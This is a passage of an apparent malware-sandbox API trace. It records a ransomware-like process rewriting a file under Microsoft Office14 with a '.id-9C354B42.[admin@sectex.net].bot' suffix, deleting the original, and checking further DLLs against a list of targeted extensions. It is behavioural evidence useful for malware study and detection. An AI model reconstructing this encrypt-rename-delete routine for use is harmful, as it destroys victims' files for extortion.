	[0159.267] ReadFile (in: hFile=0x1b4, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x53f, lpOverlapped=0x0) returned 1
	[0159.366] WriteFile (in: hFile=0x25c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x540, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x540, lpOverlapped=0x0) returned 1
	[0159.367] ReadFile (in: hFile=0x1b4, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0159.367] WriteFile (in: hFile=0x25c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xf2, lpOverlapped=0x0) returned 1
	[0159.367] SetEndOfFile (hFile=0x25c) returned 1
	[0159.368] CloseHandle (hObject=0x25c) returned 1
	[0159.368] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.368] SetEndOfFile (hFile=0x1b4) returned 1
	[0159.371] CloseHandle (hObject=0x1b4) returned 1
	[0159.371] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Custom.propdesc.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0159.371] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Custom.propdesc" (normalized: "c:\\program files\\microsoft office\\office14\\custom.propdesc")) returned 1
	[0159.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Custom.propdesc") returned 58
	[0159.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Custom.propdesc") returned 58
	[0159.372] lstrlenW (lpString=".doc") returned 4
	[0159.372] lstrcmpiW (lpString1=".doc", lpString2="desc") returned -1
	[0159.372] lstrlenW (lpString=".docx") returned 5
	[0159.372] lstrcmpiW (lpString1=".docx", lpString2="pdesc") returned -1
	[0159.372] lstrlenW (lpString=".pdf") returned 4
	[0159.372] lstrcmpiW (lpString1=".pdf", lpString2="desc") returned -1
	[0159.372] lstrlenW (lpString=".xls") returned 4
	[0159.372] lstrcmpiW (lpString1=".xls", lpString2="desc") returned -1
	[0159.372] lstrlenW (lpString=".xlsx") returned 5
	[0159.372] lstrcmpiW (lpString1=".xlsx", lpString2="pdesc") returned -1
	[0159.372] lstrlenW (lpString=".ppt") returned 4
	[0159.372] lstrcmpiW (lpString1=".ppt", lpString2="desc") returned -1
	[0159.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Custom.propdesc") returned 58
	[0159.373] lstrlenW (lpString=".zip") returned 4
	[0159.373] lstrcmpiW (lpString1=".zip", lpString2="desc") returned -1
	[0159.373] lstrlenW (lpString=".rar") returned 4
	[0159.373] lstrcmpiW (lpString1=".rar", lpString2="desc") returned -1
	[0159.373] lstrlenW (lpString=".bz2") returned 4
	[0159.373] lstrcmpiW (lpString1=".bz2", lpString2="desc") returned -1
	[0159.373] lstrlenW (lpString=".7z") returned 3
	[0159.373] lstrcmpiW (lpString1=".7z", lpString2="esc") returned -1
	[0159.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Custom.propdesc") returned 58
	[0159.373] lstrlenW (lpString=".dbf") returned 4
	[0159.373] lstrcmpiW (lpString1=".dbf", lpString2="desc") returned -1
	[0159.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Custom.propdesc") returned 58
	[0159.373] lstrlenW (lpString=".1cd") returned 4
	[0159.373] lstrcmpiW (lpString1=".1cd", lpString2="desc") returned -1
	[0159.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Custom.propdesc") returned 58
	[0159.373] lstrlenW (lpString=".jpg") returned 4
	[0159.373] lstrcmpiW (lpString1=".jpg", lpString2="desc") returned -1
	[0159.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Custom.propdesc") returned 58
	[0159.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Custom.propdesc") returned 58
	[0159.373] lstrlenW (lpString=".doc") returned 4
	[0159.373] lstrcmpiW (lpString1=".doc", lpString2="desc") returned -1
	[0159.373] lstrlenW (lpString=".docx") returned 5
	[0159.373] lstrcmpiW (lpString1=".docx", lpString2="pdesc") returned -1
	[0159.373] lstrlenW (lpString=".pdf") returned 4
	[0159.373] lstrcmpiW (lpString1=".pdf", lpString2="desc") returned -1
	[0159.373] lstrlenW (lpString=".xls") returned 4
	[0159.373] lstrcmpiW (lpString1=".xls", lpString2="desc") returned -1
	[0159.373] lstrlenW (lpString=".xlsx") returned 5
	[0159.373] lstrcmpiW (lpString1=".xlsx", lpString2="pdesc") returned -1
	[0159.374] lstrlenW (lpString=".ppt") returned 4
	[0159.374] lstrcmpiW (lpString1=".ppt", lpString2="desc") returned -1
	[0159.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Custom.propdesc") returned 58
	[0159.374] lstrlenW (lpString=".zip") returned 4
	[0159.374] lstrcmpiW (lpString1=".zip", lpString2="desc") returned -1
	[0159.374] lstrlenW (lpString=".rar") returned 4
	[0159.374] lstrcmpiW (lpString1=".rar", lpString2="desc") returned -1
	[0159.374] lstrlenW (lpString=".bz2") returned 4
	[0159.374] lstrcmpiW (lpString1=".bz2", lpString2="desc") returned -1
	[0159.374] lstrlenW (lpString=".7z") returned 3
	[0159.374] lstrcmpiW (lpString1=".7z", lpString2="esc") returned -1
	[0159.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Custom.propdesc") returned 58
	[0159.374] lstrlenW (lpString=".dbf") returned 4
	[0159.374] lstrcmpiW (lpString1=".dbf", lpString2="desc") returned -1
	[0159.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Custom.propdesc") returned 58
	[0159.374] lstrlenW (lpString=".1cd") returned 4
	[0159.374] lstrcmpiW (lpString1=".1cd", lpString2="desc") returned -1
	[0159.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Custom.propdesc") returned 58
	[0159.374] lstrlenW (lpString=".jpg") returned 4
	[0159.374] lstrcmpiW (lpString1=".jpg", lpString2="desc") returned -1
	[0159.374] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0159.374] lstrlenW (lpString="DATAGATH.DLL") returned 12
	[0159.374] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\DATAGATH.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\datagath.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0159.375] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=594288) returned 1
	[0159.375] CloseHandle (hObject=0x1b4) returned 1
	[0159.375] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\DATAGATH.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\datagath.dll")) returned 0x20
	[0159.375] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\DATAGATH.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\datagath.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.376] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\DATAGATH.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\datagath.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0159.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DATAGATH.DLL") returned 55
	[0159.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DATAGATH.DLL") returned 55
	[0159.376] lstrlenW (lpString=".doc") returned 4
	[0159.376] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0159.376] lstrlenW (lpString=".docx") returned 5
	[0159.376] lstrcmpiW (lpString1=".docx", lpString2="H.DLL") returned -1
	[0159.376] lstrlenW (lpString=".pdf") returned 4
	[0159.376] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0159.376] lstrlenW (lpString=".xls") returned 4
	[0159.376] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0159.376] lstrlenW (lpString=".xlsx") returned 5
	[0159.376] lstrcmpiW (lpString1=".xlsx", lpString2="H.DLL") returned -1
	[0159.376] lstrlenW (lpString=".ppt") returned 4
	[0159.376] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0159.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DATAGATH.DLL") returned 55
	[0159.376] lstrlenW (lpString=".zip") returned 4
	[0159.376] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0159.376] lstrlenW (lpString=".rar") returned 4
	[0159.376] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0159.376] lstrlenW (lpString=".bz2") returned 4
	[0159.376] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0159.376] lstrlenW (lpString=".7z") returned 3
	[0159.376] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0159.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DATAGATH.DLL") returned 55
	[0159.377] lstrlenW (lpString=".dbf") returned 4
	[0159.377] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0159.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DATAGATH.DLL") returned 55
	[0159.377] lstrlenW (lpString=".1cd") returned 4
	[0159.377] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0159.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DATAGATH.DLL") returned 55
	[0159.377] lstrlenW (lpString=".jpg") returned 4
	[0159.377] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0159.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DATAGATH.DLL") returned 55
	[0159.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DATAGATH.DLL") returned 55
	[0159.377] lstrlenW (lpString=".doc") returned 4
	[0159.377] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0159.377] lstrlenW (lpString=".docx") returned 5
	[0159.377] lstrcmpiW (lpString1=".docx", lpString2="H.DLL") returned -1
	[0159.377] lstrlenW (lpString=".pdf") returned 4
	[0159.377] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0159.377] lstrlenW (lpString=".xls") returned 4
	[0159.377] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0159.377] lstrlenW (lpString=".xlsx") returned 5
	[0159.377] lstrcmpiW (lpString1=".xlsx", lpString2="H.DLL") returned -1
	[0159.377] lstrlenW (lpString=".ppt") returned 4
	[0159.377] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0159.378] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DATAGATH.DLL") returned 55
	[0159.378] lstrlenW (lpString=".zip") returned 4
	[0159.378] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0159.378] lstrlenW (lpString=".rar") returned 4
	[0159.378] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0159.378] lstrlenW (lpString=".bz2") returned 4
	[0159.378] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0159.378] lstrlenW (lpString=".7z") returned 3
	[0159.378] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0159.378] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DATAGATH.DLL") returned 55
	[0159.378] lstrlenW (lpString=".dbf") returned 4
	[0159.378] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0159.378] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DATAGATH.DLL") returned 55
	[0159.378] lstrlenW (lpString=".1cd") returned 4
	[0159.378] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0159.378] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DATAGATH.DLL") returned 55
	[0159.378] lstrlenW (lpString=".jpg") returned 4
	[0159.378] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0159.378] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0159.378] lstrlenW (lpString="DBENGR.DLL") returned 10
	[0159.378] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\DBENGR.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\dbengr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0159.380] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=1197432) returned 1
	[0159.380] CloseHandle (hObject=0x1b4) returned 1
	[0159.380] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\DBENGR.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\dbengr.dll")) returned 0x20
	[0159.380] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\DBENGR.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\dbengr.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.381] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\DBENGR.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\dbengr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0159.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBENGR.DLL") returned 53
	[0159.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBENGR.DLL") returned 53
	[0159.381] lstrlenW (lpString=".doc") returned 4
	[0159.381] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0159.381] lstrlenW (lpString=".docx") returned 5
	[0159.381] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1
	[0159.381] lstrlenW (lpString=".pdf") returned 4
	[0159.381] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0159.381] lstrlenW (lpString=".xls") returned 4
	[0159.381] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0159.381] lstrlenW (lpString=".xlsx") returned 5
	[0159.381] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1
	[0159.381] lstrlenW (lpString=".ppt") returned 4
	[0159.381] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0159.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBENGR.DLL") returned 53
	[0159.381] lstrlenW (lpString=".zip") returned 4
	[0159.381] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0159.381] lstrlenW (lpString=".rar") returned 4
	[0159.381] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0159.381] lstrlenW (lpString=".bz2") returned 4
	[0159.381] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0159.381] lstrlenW (lpString=".7z") returned 3
	[0159.381] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0159.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBENGR.DLL") returned 53
	[0159.382] lstrlenW (lpString=".dbf") returned 4
	[0159.382] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0159.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBENGR.DLL") returned 53
	[0159.382] lstrlenW (lpString=".1cd") returned 4
	[0159.382] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0159.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBENGR.DLL") returned 53
	[0159.382] lstrlenW (lpString=".jpg") returned 4
	[0159.382] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0159.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBENGR.DLL") returned 53
	[0159.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBENGR.DLL") returned 53
	[0159.382] lstrlenW (lpString=".doc") returned 4
	[0159.382] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0159.382] lstrlenW (lpString=".docx") returned 5
	[0159.382] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1
	[0159.382] lstrlenW (lpString=".pdf") returned 4
	[0159.382] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0159.382] lstrlenW (lpString=".xls") returned 4
	[0159.382] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0159.382] lstrlenW (lpString=".xlsx") returned 5
	[0159.382] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1
	[0159.382] lstrlenW (lpString=".ppt") returned 4
	[0159.382] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0159.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBENGR.DLL") returned 53
	[0159.382] lstrlenW (lpString=".zip") returned 4
	[0159.382] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0159.382] lstrlenW (lpString=".rar") returned 4
	[0159.382] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0159.382] lstrlenW (lpString=".bz2") returned 4
	[0159.382] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0159.383] lstrlenW (lpString=".7z") returned 3
	[0159.383] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0159.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBENGR.DLL") returned 53
	[0159.383] lstrlenW (lpString=".dbf") returned 4
	[0159.383] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0159.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBENGR.DLL") returned 53
	[0159.383] lstrlenW (lpString=".1cd") returned 4
	[0159.383] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0159.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBENGR.DLL") returned 53
	[0159.383] lstrlenW (lpString=".jpg") returned 4
	[0159.383] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0159.383] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0159.383] lstrlenW (lpString="DBGHELP.DLL") returned 11
	[0159.383] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\DBGHELP.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\dbghelp.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0159.384] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=1369952) returned 1
	[0159.384] CloseHandle (hObject=0x1b4) returned 1
	[0159.384] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\DBGHELP.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\dbghelp.dll")) returned 0x20
	[0159.384] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\DBGHELP.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\dbghelp.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.384] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\DBGHELP.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\dbghelp.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0159.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBGHELP.DLL") returned 54
	[0159.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBGHELP.DLL") returned 54
	[0159.384] lstrlenW (lpString=".doc") returned 4
	[0159.384] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0159.384] lstrlenW (lpString=".docx") returned 5
	[0159.384] lstrcmpiW (lpString1=".docx", lpString2="P.DLL") returned -1
	[0159.384] lstrlenW (lpString=".pdf") returned 4
	[0159.384] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0159.384] lstrlenW (lpString=".xls") returned 4
	[0159.384] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0159.384] lstrlenW (lpString=".xlsx") returned 5
	[0159.385] lstrcmpiW (lpString1=".xlsx", lpString2="P.DLL") returned -1
	[0159.385] lstrlenW (lpString=".ppt") returned 4
	[0159.385] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0159.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBGHELP.DLL") returned 54
	[0159.385] lstrlenW (lpString=".zip") returned 4
	[0159.385] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0159.385] lstrlenW (lpString=".rar") returned 4
	[0159.385] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0159.385] lstrlenW (lpString=".bz2") returned 4
	[0159.385] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0159.385] lstrlenW (lpString=".7z") returned 3
	[0159.385] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0159.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBGHELP.DLL") returned 54
	[0159.385] lstrlenW (lpString=".dbf") returned 4
	[0159.385] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0159.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBGHELP.DLL") returned 54
	[0159.385] lstrlenW (lpString=".1cd") returned 4
	[0159.385] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0159.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBGHELP.DLL") returned 54
	[0159.385] lstrlenW (lpString=".jpg") returned 4
	[0159.385] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0159.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBGHELP.DLL") returned 54
	[0159.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBGHELP.DLL") returned 54
	[0159.385] lstrlenW (lpString=".doc") returned 4
	[0159.385] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0159.385] lstrlenW (lpString=".docx") returned 5
	[0159.385] lstrcmpiW (lpString1=".docx", lpString2="P.DLL") returned -1
	[0159.385] lstrlenW (lpString=".pdf") returned 4
	[0159.385] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0159.385] lstrlenW (lpString=".xls") returned 4
	[0159.386] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0159.386] lstrlenW (lpString=".xlsx") returned 5
	[0159.386] lstrcmpiW (lpString1=".xlsx", lpString2="P.DLL") returned -1
	[0159.386] lstrlenW (lpString=".ppt") returned 4
	[0159.386] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0159.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBGHELP.DLL") returned 54
	[0159.386] lstrlenW (lpString=".zip") returned 4
	[0159.386] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0159.386] lstrlenW (lpString=".rar") returned 4
	[0159.386] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0159.386] lstrlenW (lpString=".bz2") returned 4
	[0159.386] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0159.386] lstrlenW (lpString=".7z") returned 3
	[0159.386] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0159.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBGHELP.DLL") returned 54
	[0159.386] lstrlenW (lpString=".dbf") returned 4
	[0159.386] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0159.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBGHELP.DLL") returned 54
	[0159.386] lstrlenW (lpString=".1cd") returned 4
	[0159.386] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0159.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBGHELP.DLL") returned 54
	[0159.386] lstrlenW (lpString=".jpg") returned 4
	[0159.386] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0159.386] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0159.386] lstrlenW (lpString="DBSHARE.DLL") returned 11
	[0159.387] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\DBSHARE.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\dbshare.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0159.388] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=99272) returned 1
	[0159.388] CloseHandle (hObject=0x1b4) returned 1
	[0159.388] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\DBSHARE.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\dbshare.dll")) returned 0x20
	[0159.388] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\DBSHARE.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\dbshare.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.388] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\DBSHARE.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\dbshare.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0159.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBSHARE.DLL") returned 54
	[0159.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBSHARE.DLL") returned 54
	[0159.388] lstrlenW (lpString=".doc") returned 4
	[0159.388] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0159.388] lstrlenW (lpString=".docx") returned 5
	[0159.388] lstrcmpiW (lpString1=".docx", lpString2="E.DLL") returned -1
	[0159.388] lstrlenW (lpString=".pdf") returned 4
	[0159.388] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0159.388] lstrlenW (lpString=".xls") returned 4
	[0159.388] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0159.388] lstrlenW (lpString=".xlsx") returned 5
	[0159.389] lstrcmpiW (lpString1=".xlsx", lpString2="E.DLL") returned -1
	[0159.389] lstrlenW (lpString=".ppt") returned 4
	[0159.389] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0159.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBSHARE.DLL") returned 54
	[0159.389] lstrlenW (lpString=".zip") returned 4
	[0159.389] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0159.389] lstrlenW (lpString=".rar") returned 4
	[0159.389] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0159.389] lstrlenW (lpString=".bz2") returned 4
	[0159.389] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0159.389] lstrlenW (lpString=".7z") returned 3
	[0159.389] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0159.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBSHARE.DLL") returned 54
	[0159.389] lstrlenW (lpString=".dbf") returned 4
	[0159.389] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
